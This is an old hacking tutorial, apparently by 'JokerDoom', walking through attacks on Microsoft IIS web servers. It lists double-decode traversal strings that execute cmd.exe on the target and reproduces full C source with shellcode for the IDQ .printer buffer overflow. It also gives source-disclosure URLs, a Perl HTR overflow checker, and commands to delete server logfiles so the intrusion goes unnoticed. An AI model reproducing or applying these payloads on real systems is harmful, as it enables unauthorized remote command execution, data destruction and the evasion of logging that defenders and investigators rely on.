You are on page 1of 10

writes: The Step By Step IIS 4 Hack This is not a article for a script kiddie.

It's a little late but still applicab le today, very applicable. This article is inteded to be a robust guide for hack ing, and administering IIS 5 servers. So without further adeu The Ultimate IIS G uide. Outline: I. Introduction II. Information Gathering A. Enumeration B. Identify the directory structure C. Is it patched or not? III. Exploits A. Double Decode(Superflous) B. IDQ Buffer Overflow C. Source Code Disclosure Exploits 1. Historical Importance 2. Impact 3. New Source Code Disclosure Vulnerabilities D. WebDav Exlploit IV. Covering your Tracks A. Where are the Logfiles? B. Why can't I delete them now! C. How I will delete them later.

Foreword Know your stuff! Remember by default all actions of yours are logged on IIS 5 an d the FTP server, not sure about the smtp server but who cares, you can't use VR FY anyway! Let's say you are hacking a web server, and you know it is IIS 5. If the IIS Ser ver is running it has a virtual root. By default the virtual root is c:\inetpub\ wwwroot\. So if you send the request

GET /frick.html HTTP/1.0

It checks c:\inetpub\wwwroot\ to see if it has a file named frick.html if it doe s it sends it. Now if you request the default document by way of

GET / HTTP/1.0

It then looks for the default document. Which if left unchanged is c:\inetpub\ww wroot\iisstart.asp. You must manually change the default document to whatever yo

u wish using the IIS Configuration Dialog. If the pages default.asp or default.h tm exist it will serve them instead. If both exist it will serve default.asp. Th is is the default precedence of the sample pages.

The first things you should check for while gathering info about the server is i f the administrator has preserved the default directory structure and such. A vi rtual directory is a directory that can be accessed by IIS without the directory actually being in the virtual root. Virtual Directories that you should check f or first are: /_vti_bin/ /scripts/ /msadc/ /iissamples/ /_vti_pvt/ /_vti_cnf/ /_private/

"What good does this do?" you might ask? Well, first it gives you a feel for the directory structure of the machine. And second, if they have failed to patch th eir machine, you might be able to exploit it using one of the technique's I desc ribe in this paper. After checking those first directories, you can check for so me common directories on websites that have chosen not to keep the default struc ture such as these. /cgi-bin/ /bin/ /admin/ /config/ /asp/ /cfg/ /exe/ /php/ /perl/ /binary/ /src/ /tar/ /include/ /topics/ /pwd/ /private/ /conf/ /logs/ /log/ /audio/ /sound/ /pvt/ /images/ /public/ /home/ /cpp/ /db/ /data/ /news/

But don't let this list limit you. You must know as much as possible about the s ystem. So use your imaginiation. Ok? Done using your imagination. Ready for the 31337 stuff? Lets begin. If the web page has a default under construction page, it is most likely that the Server was installed by accident and that the current user of the computer does not know about it. It has happened many times. At lea st 5 times with people I know. However whether or not they installed it by accid ent, the known vulnerabilities for the default installation are worthless if the y used the windows update. Which eradicates at least 10-20 exploits. Also before you start hacking away at the server you want do a port scan, if you haven't al ready, and see if ftp is running it might come in handy as we will discuss later .

The first exploits I will discuss are the Double Decode(sometimes called the Sup erflous Decode)Directory Traversal Attacks. These are easily exploitable on a de fault installation of IIS 5.0. Some people think that you must have a myriad of tools to hack. This is a very clean cut example that prooves you can get root, a rmed with only a web browser. To exploit this you must first find a directory wi th execute permissions. Such directories by default are: scripts, iissamples, ms

adc, and _vti_bin. In a possible exploit request string you could have "http://5 5.55.55.55/scripts" & *Exploit String*. I put *A Exploit String there because th ere are many to choose from as listed below.(These exploit strings all execute t he dos command dir, which gives directory listing)

/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: /..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+d ir+c: /..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: /..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: /..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: /..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c : /..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: /..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cm d.exe?/c+dir+c: I am going to stop listing exploit strings to preserve brevity. But the way the exploit works is that IIS checks for "/../../" (dot-slash) attacks before decodi ng the request string. So it does not notice that after it decodes the urlencode d string that it is in fact allowing a traversal to take place. Maybe an example will help. Let decode this string "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/s ystem32/cmd.exe?/c+dir+c:\". We know that %35 decodes to 5 so replace all the %3 5s with 5 which looks like this "/scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd .exe?/c+dir+c:\". Then it checks to make sure it got all the url encoded stuff a nd it realizes it forgot to decode %5c, which is a \(also IIS changes /'s to \'s ). Thus the final path that IIS is left with is "\scripts\..\..\..\..\winnt\syst em32\cmd.exe?\c+dir+c:\" which tells IIS to hop down four directories and then t o look in c:\winnt\system32\cmd.exe and since the original directory was scripts and had execute permissions it executes the shell "cmd.exe" and passes the comm and line parameters behind the ? in the http request. The shell command would lo ok like this "cmd.exe /c dir c:\".

This is exploit is only limited by your imagination. You can copy files, delete them, disable logging and even delete old logs by utilizing this technique. I ha ve heard that you can upload files using it as well but I haven't been able to d o it myself. You can make their floppy drive spin and if they have a disk in at the time, you can read files off of it easily with a type command! This is possi ble with a cd-rom drive too. There is probably a way to eject the cdrom but I do n't know how. More information on this exploit at end of paper.

The next exploit is the exploit used by the codered worm to squiggle its way thr ough the ineternet. And unless you live in front of your old commodore 64 with n o internet connection(which some of you might judging from the pictures at newor der) you will no doubt know how effective codered was. The exploit was dubbed th e IDQ .Printer Overflow(Pronounced I Dee Que (dot) Printer). The exploit was fir st discovered by www.eeye.com they released a simple proof of concept. The proof of concept writes a file to the root of any machine that describes how to remed y the vulnerability. The exploit is done by making a request such as GET /NULL.printer HTTP/1.0 HOST: [420 char Buffer]

At the 420 char mark you have succesfully overwritten EIP. Then shove in your sh ellcode and root it! The following proof of concept was provided by www.eeye.com Note: I have been unable to get their proof of concept to work and will provide another and references to others at the end of this paper. Begin File iishack2000.c #ifdef _WIN32 #include <Winsock2.h> #include <Windows.h> #define snprintf _snprintf #else #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #endif #include <stdio.h> void usage(); unsigned char GetXORValue(char *szBuff, unsigned long filesize); unsigned char sc[2][315]={ "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x8 0\x30\x03\x40\xe2\xfa\ xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\ x80\xc4\x07\x88\xf6\x3 0\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3 d\x80\xc5\x07\x80\xc4\ x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\ x69\x01\x53\x53\x6b\x0 3\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x1 7\x50\xfc\x56\x0f\x50\ xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\ xb3\xeb\x74\x27\x49\xe a\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x7 7\x03\x6a\x6a\x70\x6b\ x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\ x23\x50\x66\x60\x76\x7 1\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6 a\x70\x6a\x77\x39\x23\ x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\ x03\x03\x03\x03\x03\x0 3\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x9 0\x90\xcb\x4a\x42\x6c\ x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\ x03\x03\x03\x03\x03\x0 3\x03\x03\x03\x03\x03\x03\x03\x00", "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x8 0\x30\x03\x40\xe2\xfa\ xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\ x80\xc4\x07\x88\xf6\x3 0\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3 d\x80\xc5\x07\x80\xc4\ x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\ x69\x01\x53\x53\x6b\x0 3\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x1 7\x50\xfc\x56\x0f\x50\

xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\ xf0\xeb\x74\x4c\x30\xe b\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x7 7\x03\x6a\x6a\x70\x6b\ x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\ x23\x50\x66\x60\x76\x7 1\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6 a\x70\x6a\x77\x39\x23\ x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\ x03\x03\x03\x03\x03\x0 3\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x9 0\x90\xcb\x4a\x42\x6c\ x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\ x03\x03\x03\x03\x03\x0 3\x03\x03\x03\x03\x03\x03\x03\x00"}; main (int argc, char *argv[]) { char request_message[500]; int X,sock,sp=0; unsigned short serverport=htons(80); struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr attack; #ifdef _WIN32 WORD werd; WSADATA wsd; werd= MAKEWORD(2,0); WSAStartup(werd,&wsd); #endif printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n"); printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n"); printf("Exploit by Ryan Permeh <ryan@eeye.com>\n"); if(argc < 4) usage(); if(argv[1] != NULL) { nametocheck = gethostbyname (argv[1]); memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4); } else usage(); if(argv[2] != NULL) { serverport=ntohs((unsigned short)atoi(argv[2])); } if(argv[3] != NULL) { sp=atoi(argv[3]); } printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,i net_ntoa(attack),htons (serverport)); memset(request_message,0x00,500); snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n \r\n",sc[sp]); sock = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family=AF_INET; serv_addr.sin_addr.s_addr = attack.s_addr; serv_addr.sin_port = serverport; X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));

if(X==0) { send(sock,request_message,strlen(request_message)*sizeof(char),0 ); printf("Sent overflow, now look on the c: drive of %s for www.eE ye.com.txt\n",inet_nto a(attack)); printf("If the file doesn't exist, the server may be patched,\no r may be a different s ervice pack (try again with %d as the service pack)\n",sp==0?1:0); } else { printf("Couldn't connect\n",inet_ntoa(attack)); } #ifdef _WIN32 closesocket(sock); #else close(sock); #endif return 0; } void usage() { printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n") ; printf("Example: iishack2000 127.0.0.1 80 0\n"); printf("Example: iishack2000 127.0.0.1 80 1\n"); exit(1); } End of File The next series of exploits will focus on script source code disclosure. The fir st exploit for this is caused by a sample script that comes with IIS 5.0. It's n ame is codebrws.asp. codebrws.asp was meant to show people how to create simple scripts, and is also able to format already created scripts into nice colors, an yway, it opens the file specified in the url variable &source. /iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/sdk/asp/docs/codebrw s.asp /iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/%c0%ae%c0%ae/iisstar t.asp

The next vulnerability is releatively new, so I won't pretend to have expereince exploiting it. It's called the HTR Chunked Encoding Buffer overflow and I have a proof of concept right here for you. The Information you need should be in the script. It is in perl, sorry windows users, but if you use windows and still wa nt to try to run it, goto activestate.com Begin File HTR_Exploit.pl #!/usr/bin/perl ########################################################################

# (c) Filip Maertens/CISSP, .HTR Heap Overflow checker. # # DISCLAIMER: This tool is only to be used for legitimate purposes only. # This is considered as an intrusive, so please adhere to the laws and # regulations applicable in your country. Oh, and honey, there is pizza # in the fridge... # # CREDITS: @stake/KPMG for the advisory # Thor Larholm for the patch identification remark # ######################################################################## use Socket; print "iischeck.pl | Microsoft .HTR Heap Overflow Checker | <filip\@securax.be>\ n-----------------------------------------------------------------------\n"; $host= @ARGV[ 0 ]; $method= @ARGV[ 2 ]; my $target = inet_aton($host); $port = 80; $requestmethod[0] = "GET"; $requestmethod[1] = "HEAD"; $requestmethod[2] = "POST"; # Initializing strings & vars $patchedstring = "InsertElementAnchor"; $nonpatchedstring = "document.write"; $bogusurl = "/xxxiischeckxxx"; # Main loop of rotten code if ($host ne "") { print " -- Checking hostname: $host\n"; $rawrequest = "$requestmethod[$method] $bogusurl HTTP/1.1\nClient-Agent:iische ck.pl\nHost:$host\r\n\r\n"; @results = sendrequestandgetanswer($rawrequest); $criticalline = $results[49]; if ($results[2] =~ "IIS") { SWITCH: { if ($criticalline =~ $nonpatchedstring) { $patched = " -- Status : System vulnerable."; last SWITCH; } if ($criticalline =~ $patchedstring) { $patched = " -- Status: S ystem MS02-18 patched."; last SWITCH; } $patched = " -- Status: Cannot identify patch level"; } print "$patched\n\n"; } else { # 49, since HTTP headers are included

print " -- Error: System is not a Windows/IIS host.\n\n"; } } else { showusage(); } exit(0); #######: Functions used by iischeck.pl :####### sub showusage { print "Usage: iischeck [hostname] -method [method]\n"; } sub sendrequestandgetanswer { my ($rawrequest)= @_; @lines = sendrawandgetanswer ($rawrequest); return @lines; } sub sendrawandgetanswer { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') || 0) || die(" -- Error in creating socket\n"); if (connect(S,pack "SnA4x8",2,$port,$target)) { my @in=""; select(S); $|=1; print $pstr; <!--while(<S>)--> { push @in,$_; last if ($line=~ /^[rn]+$/ ); } select(STDOUT); return @in; } else { die(" -- Error connecting to: $host\n"); } } sub sendraw { my ($pstr)=@_;

socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') || 0) || die("Socket pro blems\n"); if (connect(S,pack "SnA4x8",2,$port,$target)) { my @in=""; select(S); $|=1; print $pstr; } else { die("connect problems\n"); } } End of File Well I know the last one needs more info, but hey, would it be fun If I spoonfed ya'll all the way? That exploit unlike the other's listed will even work with I IS 5.1, which is the web server that comes with Windows XP Professional.

So you got in? You have at this point (hopefully) found a hole in this IIS serve r and have or are going to exploit it. What you do next is up to you. But bear i n mind that, by default, all actions on IIS 5 and it's FTP server are logged. An d that is what the next seciton is about.

The web server log resides in "c:\winnt\system32\logfiles\w3svc1\". The FTP serv er log is stored in "c:\winnt\system32\logfiles\ftpsvc1\". They log you rip addr ess and what request you made to the server. By default they do not examine your request to see if you used a proxy. The logfiles are named according to the dat e. Everyday IIS creates a new logfile. So, if you did some naughty stuff today, find a proxy, come back tomorrow, and use these command's by way of the double d ecode exploit, if they are available. If they aren't available, because no direc tories, have execute permission's you can brute force the FTP server(use a ftp p roxy for this one to!), and then when you get admin priveleges, you can delete t he logs, or modify them, and don't forget to save some of them to your box, many times, you will find boxe's ips that have fallen victim to the codeRed worm, an d those are vulnerable to the double decode attack, and the IDQ buffer overflow, and most of the time are complete default IIS 5 installations.

Useful Double Decode By the way I haven't he reason I couldn't my server that I was

Command's(The command comes after the exploit string) tested all of these but I have tested as many as I could, t test them all was because using was shut down while I was testing them.

/cmd.exe?/c+dir+c: /cmd.exe?/c+type+....win.ini (Try Different combinations with this one, for some reason c:pathfilename didn't work in my test /cmd.exe?/c+type+..\..\config.sys /cmd.exe?/c+dir+c:\WinNT\System32\LogFiles\ /cmd.exe?/c+del+\LogFiles\w3svc1\ex030601.log or

/cmd.exe?/c+del+c:\WinNT\System32\Logfiles\ex030601.log The last one was just an example, but remember your going to have to find out th e names of the logfiles so you can delete them yourself. Remember though, you ca n't delete the most recent logfile as it is being used by IIS, so if your unable to modify win.ini to delete it. And don't forget, search google for the command 's that let you upload files using tftp. I hope you have at least been enlighten ed in some way about IIS 5 in this paper, thank you If you think this paper coul d use a little more before being posted or whatever just send it back with comme nts I will revise it if needed.

Shoutz: nex(dv2), e-eye, packetstorm, neworder, blacksun, irc.freenode.com, and the box networks

JokerDoom